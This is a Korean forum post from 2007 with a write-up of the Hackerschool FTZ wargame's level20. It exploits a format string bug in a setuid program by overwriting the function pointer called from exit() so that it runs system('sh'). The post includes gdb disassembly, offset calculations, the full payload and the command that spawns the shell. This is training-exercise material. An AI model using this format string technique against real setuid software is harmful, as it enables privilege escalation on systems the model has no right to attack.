레벨 해킹

2844,

10/143

pogusm

level20 // exit함수 취약점을 이용하여 쉘 실행하기.

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_level&no=2593 [복사]

참고 자료 : randomkid님 자료를 참고하였습니다.
** ///  exit함수의 취약점을 이용하여 exploit 해보자

/// 포맷스트링버그를 이용하여
/// exit함수중 <exit+109> call   *0x4(%edx) 에서 함수를 호출하는데,
/// *0x4(%edx) (= %edx+4)의 값을 -- system함수 시작주소로 넣어주고
/// "sh"라는 문자열을 임의의 장소에 저장한후
/// <exit+109>에서 함수를 호출할때, 인자값으로 넣어주는 %edx+8을 "sh"문자열의 주소로 넣어주어
/// exploit을 실행해보자...

[level20@ftz in]$ cat ~/hint

#include <stdio.h>
main(int argc,char **argv)
{ char bleh[80];
  setreuid(3101,3101);
  fgets(bleh,79,stdin);
  printf(bleh);
}

[level20@ftz in]$ ~/attackme
sssshhhh%8x%8x%8x%8x%8x
sssshhhh      4f401574604009d5007373737368686868

/// 79개의 문자열로 이루어진 공격코드로
/// printf에서 포맷스트링 버그를 이용하여,
/// 원하는 주소의 값을 수정할수 있다.

[level20@ftz in]$ gdb -q ~/attackme
(gdb) br main
Breakpoint 1 at 0x80483be
(gdb) r
Starting program: /home/level20/attackme

Breakpoint 1, 0x080483be in main ()
(gdb) disass exit
Dump of assembler code for function exit:
0x4004d8d0 <exit+0>:    push   %ebp
0x4004d8d1 <exit+1>:    mov    %esp,%ebp
0x4004d8d3 <exit+3>:    push   %edi
0x4004d8d4 <exit+4>:    push   %esi
0x4004d8d5 <exit+5>:    push   %ebx
0x4004d8d6 <exit+6>:    call   0x4003877d <__i686.get_pc_thunk.bx>
0x4004d8db <exit+11>:   add    $0x10b8e5,%ebx
0x4004d8e1 <exit+17>:   sub    $0xc,%esp
0x4004d8e4 <exit+20>:   mov    0xffffebcc(%ebx),%ecx
0x4004d8ea <exit+26>:   mov    0x8(%ebp),%edi
0x4004d8ed <exit+29>:   test   %ecx,%ecx
0x4004d8ef <exit+31>:   je     0x4004d96d <exit+157>
0x4004d8f1 <exit+33>:   jmp    0x4004d900 <exit+48>
0x4004d8f3 <exit+35>:   nop
0x4004d8f4 <exit+36>:   nop
0x4004d8f5 <exit+37>:   nop
0x4004d8f6 <exit+38>:   nop
0x4004d8f7 <exit+39>:   nop
0x4004d8f8 <exit+40>:   nop
0x4004d8f9 <exit+41>:   nop
0x4004d8fa <exit+42>:   nop
0x4004d8fb <exit+43>:   nop
0x4004d8fc <exit+44>:   nop
0x4004d8fd <exit+45>:   nop
0x4004d8fe <exit+46>:   nop
0x4004d8ff <exit+47>:   nop
0x4004d900 <exit+48>:   mov    0x4(%ecx),%eax
0x4004d903 <exit+51>:   mov    %ecx,%edx
0x4004d905 <exit+53>:   test   %eax,%eax
0x4004d907 <exit+55>:   je     0x4004d94f <exit+127>
0x4004d909 <exit+57>:   lea    0x0(%esi,1),%esi
0x4004d910 <exit+64>:   mov    0x4(%edx),%eax
0x4004d913 <exit+67>:   dec    %eax
0x4004d914 <exit+68>:   mov    %eax,0x4(%edx)
0x4004d917 <exit+71>:   shl    $0x4,%eax
0x4004d91a <exit+74>:   lea    (%eax,%edx,1),%esi
0x4004d91d <exit+77>:   mov    0x8(%esi),%eax
0x4004d920 <exit+80>:   lea    0x8(%esi),%edx
0x4004d923 <exit+83>:   cmp    $0x4,%eax
0x4004d926 <exit+86>:   ja     0x4004d946 <exit+118>
0x4004d928 <exit+88>:   mov    0xfffefa48(%ebx,%eax,4),%eax
0x4004d92f <exit+95>:   add    %ebx,%eax
---Type <return> to continue, or q <return> to quit---
0x4004d931 <exit+97>:   jmp    *%eax
0x4004d933 <exit+99>:   mov    0x8(%edx),%eax     <--- 함수를 호출하기전, $edx+8의 값을 $eax에 넣어서, 호출할 함수가 사용할 인자로 쓴다.
0x4004d936 <exit+102>:  mov    %edi,(%esp,1)
0x4004d939 <exit+105>:  mov    %eax,0x4(%esp,1)
0x4004d93d <exit+109>:  call   *0x4(%edx)                   <---- $edx+4에 저장되어있는 함수의 주소값을 호출한다
0x4004d940 <exit+112>:  mov    0xffffebcc(%ebx),%ecx
0x4004d946 <exit+118>:  mov    0x4(%ecx),%eax
0x4004d949 <exit+121>:  mov    %ecx,%edx
0x4004d94b <exit+123>:  test   %eax,%eax
0x4004d94d <exit+125>:  jne    0x4004d910 <exit+64>
0x4004d94f <exit+127>:  mov    (%ecx),%edx
0x4004d951 <exit+129>:  test   %edx,%edx
0x4004d953 <exit+131>:  mov    %edx,0xffffebcc(%ebx)
0x4004d959 <exit+137>:  je     0x4004d963 <exit+147>
0x4004d95b <exit+139>:  mov    %ecx,(%esp,1)
0x4004d95e <exit+142>:  call   0x40038730 <_r_debug+142608>
0x4004d963 <exit+147>:  mov    0xffffebcc(%ebx),%ecx
0x4004d969 <exit+153>:  test   %ecx,%ecx
0x4004d96b <exit+155>:  jne    0x4004d900 <exit+48>
0x4004d96d <exit+157>:  mov    0x1d0(%ebx),%esi
0x4004d973 <exit+163>:  cmp    0x20c(%ebx),%esi
0x4004d979 <exit+169>:  jae    0x4004d9a1 <exit+209>
0x4004d97b <exit+171>:  nop
0x4004d97c <exit+172>:  lea    0x0(%esi,1),%esi
0x4004d980 <exit+176>:  call   *(%esi)
0x4004d982 <exit+178>:  add    $0x4,%esi
0x4004d985 <exit+181>:  cmp    0x20c(%ebx),%esi
0x4004d98b <exit+187>:  jb     0x4004d980 <exit+176>
0x4004d98d <exit+189>:  jmp    0x4004d9a1 <exit+209>
0x4004d98f <exit+191>:  nop
0x4004d990 <exit+192>:  call   *0x4(%edx)
0x4004d993 <exit+195>:  jmp    0x4004d940 <exit+112>
0x4004d995 <exit+197>:  mov    %edi,0x4(%esp,1)
0x4004d999 <exit+201>:  mov    0x8(%edx),%eax
0x4004d99c <exit+204>:  mov    %eax,(%esp,1)
0x4004d99f <exit+207>:  jmp    0x4004d93d <exit+109>
0x4004d9a1 <exit+209>:  mov    %edi,(%esp,1)
0x4004d9a4 <exit+212>:  call   0x400d13ec <_exit>
0x4004d9a9 <exit+217>:  nop
0x4004d9aa <exit+218>:  nop
0x4004d9ab <exit+219>:  nop
0x4004d9ac <exit+220>:  nop
0x4004d9ad <exit+221>:  nop
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb) x/x $edx
0x401597b8 <initial+24>:        0x00000004
(gdb)
0x401597bc <initial+28>:        0x08048438     <---- <__libc_csu_fini> 함수를 가르키고 있다.
(gdb)
0x401597c0 <initial+32>:        0x00000000      <---- 인자로 사용할 값은 비어있다.
(gdb)
0x401597c4 <initial+36>:        0x00000000
(gdb) x/x 0x08048438
0x8048438 <__libc_csu_fini>:    0x53e58955
(gdb)
0x804843c <__libc_csu_fini+4>:  0x94b8b850
(gdb)
(gdb) disass system
Dump of assembler code for function system:
0x40064430 <system+0>:  push   %ebp
0x40064431 <system+1>:  mov    %esp,%ebp
0x40064433 <system+3>:  sub    $0x18,%esp
0x40064436 <system+6>:  mov    %esi,0xfffffff8(%ebp)
0x40064439 <system+9>:  mov    0x8(%ebp),%esi
0x4006443c <system+12>: mov    %ebx,0xfffffff4(%ebp)
0x4006443f <system+15>: call   0x4003877d <__i686.get_pc_thunk.bx>
0x40064444 <system+20>: add    $0xf4d7c,%ebx
0x4006444a <system+26>: mov    %edi,0xfffffffc(%ebp)
0x4006444d <system+29>: test   %esi,%esi
0x4006444f <system+31>: je     0x40064493 <system+99>
0x40064451 <system+33>: mov    0x2ba8(%ebx),%eax
0x40064457 <system+39>: test   %eax,%eax
....
....
(gdb) x/20x 0x80495a0
0x80495a0 <_GLOBAL_OFFSET_TABLE_>:      0x080494c4      0x40015a38      0x4000bcb0      0x080482ce
0x80495b0 <_GLOBAL_OFFSET_TABLE_+16>:   0x40038850      0x080482ee      0x080482fe      0x00000000
0x80495c0 <stdin@@GLIBC_2.0>:   0x40157460      0x00000000      0x00000000      0x00000000
0x80495d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x80495e0:      0x00000000      0x00000000      0x00000000      0x00000000
(gdb)       <--- 빈공간에 "sh"문자열(s=73,h=68 /// 0x00006873 )을 저장해서 사용한다.
                 /// 대충 0x80495d0 주소에 기록하기로 했다.
(gdb) shell
[level20@ftz in]$ ps
  PID TTY          TIME CMD
21023 pts/3    00:00:01 bash
15516 pts/3    00:00:00 gdb
15517 pts/3    00:00:00 attackme
22638 pts/3    00:00:00 bash
22667 pts/3    00:00:00 ps
[level20@ftz in]$ cat /proc/15517/maps
08048000-08049000 r-xp 00000000 03:02 212800     /home/level20/attackme
08049000-0804a000 rw-p 00000000 03:02 212800     /home/level20/attackme   <---- 이 메모리부분중 빈곳에 "sh"를 기록할것이다.. (근데 이곳 뭐하는곳인지... 저도 잘 모르겠군요..)
40000000-40015000 r-xp 00000000 03:02 3482984    /lib/ld-2.3.2.so
40015000-40016000 rw-p 00014000 03:02 3482984    /lib/ld-2.3.2.so
40016000-40017000 rw-p 00000000 00:00 0
40023000-40156000 r-xp 00000000 03:02 3482991    /lib/libc-2.3.2.so
40156000-4015a000 rw-p 00132000 03:02 3482991    /lib/libc-2.3.2.so
4015a000-4015c000 rw-p 00000000 00:00 0
bfffe000-c0000000 rwxp fffff000 00:00 0
[level20@ftz in]$
--------------------------------------------------------------------------------------

1. 0x80495d0 주소에 0x00006873를 덮어쓴다 ("sh"문자열(s=73,h=68 /// 0x00006873 ))
2. 0x401597bc <initial+28> 에   system함수의 시작주소( 0x40064430 <system+0>)를 덮어쓴다
3. 0x401597c0 <initial+32> 에   system함수에서 사용할 "인자"값이 저장된 주소(0x80495d0) 를 덮어쓴다.

공격대상 프로그램이 79개의 문자열만 받아들이므로, 79byte가 넘지 않게 공격코드를 작성해야한다.

//sh문자열(0x00006873 )
0x6873 = 26739

//system함수 시작주소(0x40064430)
0x4430  ----sh문자열보다 작은수이므로---->  0x14430=82992
0x4006  ----직전0x14430보다 작은수이므로---> 0x24006=147462

//"인자"값의 주소가 저장된 주소(0x080495d0)
0x95d0  ----직전0x24006보다 작은수이므로---> 0x295d0=169424
0x0804  ----직전0x295d0보다 작은수이므로---> 0x30804=198660

"\xd0\x95\x04\x08"          <--- sh문자열을 기록한 비어있는 메모리공간의 주소.
"\xbc\x97\x15\x40\xbe\x97\x15\x40"   <--- exit함수가 호출할 주소가 저장되는 위치($edx+4)
"\xc0\x97\x15\x40\xc2\x97\x15\x40"    <--- 호출되는 함수가 인수로 사용하는 주소($edx+8)  // 여기까지 20byte

%26719x     <---- sh문자열(0x6873)의 10진수값 26739 에서, 위에까지의 20byte를 뺀수   /// 7byte
%4$hn        <---- 4$번째값이 0x080495d0을 가르키며, %hn 포맷스트링으로 주소의 높은곳부터 기록한다.  /// 5byte

%56253x     <---- system함수의시작주소중 첫번째 값 82992에서 직전의 26739 를 뺀값   /// 7byte
%5$n        <---- 5$번째값이 0x401597bc를 가르키며, %n 포맷스트링으로 주소의 낮은곳부터 기록한다.  /// 4byte

%64470x     <---- system함수의시작주소중 두번째 값 147462에서 직전의 82992를 뺀값 /// 7byte
%6$n        <---- 6$번째값이 0x401597be를 가르키며, %n 포맷스트링으로 주소의 낮은곳부터 기록한다.  /// 4byte

%21962x     <---- "인자"값이 저장된 주소의 첫번째 값 169424 에서 직전의 147462를 뺀값 /// 7byte
%7$n        <---- 7$번째값이 0x401597c0을 가르키며, %n 포맷스트링으로 주소의 낮은곳부터 기록한다.  /// 4byte

%29236x     <---- "인자"값이 저장된 주소의 두번째 값 198660 에서 직전의 169424를 뺀값 /// 7byte
%8$n        <---- 8$번째값이 0x401597c2을 가르키며, %n 포맷스트링으로 주소의 낮은곳부터 기록한다.  /// 4byte

20+7+5+7+4+7+4+7+4+7+4=76byte 로 공격코드로 써도 무방하다.

완성된 공격코드
"\xd0\x95\x04\x08"+"\xbc\x97\x15\x40\xbe\x97\x15\x40"+"\xc0\x97\x15\x40\xc2\x97\x15\x40"+"%26719x%4$hn%56253x%5$n%64470x%6$n%21962x%7$n%29236x%8$n"

------------------------
[level20@ftz in]$ (python -c 'print "\xd0\x95\x04\x08"+"\xbc\x97\x15\x40\xbe\x97\x15\x40"+"\xc0\x97\x15\x40\xc2\x97\x15\x40"+"%26719x%4$hn%56253x%5$n%64470x%6$n%21962x%7$n%29236x%8$n"';cat) | ~/attackme
..........                                     ............
                             ..........                                  ............                   ........       401597bc
id
uid=3101(clear) gid=3100(level20) groups=3100(level20)
my-pass

clear Password is "********************************".
웹에서 등록하세요.

* 해커스쿨의 모든 레벨을 통과하신 것을 축하드립니다.
당신의 끈질긴 열정과 능숙한 솜씨에 찬사를 보냅니다.
해커스쿨에서는 실력있는 분들을 모아 연구소라는 그룹을 운영하고 있습니다.
이 메시지를 보시는 분들 중에 연구소에 관심있으신 분은 자유로운 양식의
가입 신청서를 admin@hackerschool.org로 보내주시기 바랍니다.

-----------------------
공격에 성공하였다.

참고 자료 : randomkid님 자료를 참고하였습니다. 완소randomkid님. ㅋㅋ

Hit : 3422 Date : 2007/12/02 04:28


randomkid	대단하시네요 그걸 성공하시다니 ^^ 축하드립니다.`	2007/12/02
pogusm	ㅋ randomkid님 문서보고 걍 따라한것뿐인데요...ㅋㅋ // 어셈코드 보고 분석해낼 능력이 없죠.. ㅋㅋㅋ	2007/12/02
pogusm	따라하는것도.. 한 3번 포기할까 말까 망설이다.. 가까스로 해냈습니다... "오타와 뺄셈"때문에 진짜 캐고생했네여.. ㅠ_ㅠ	2007/12/02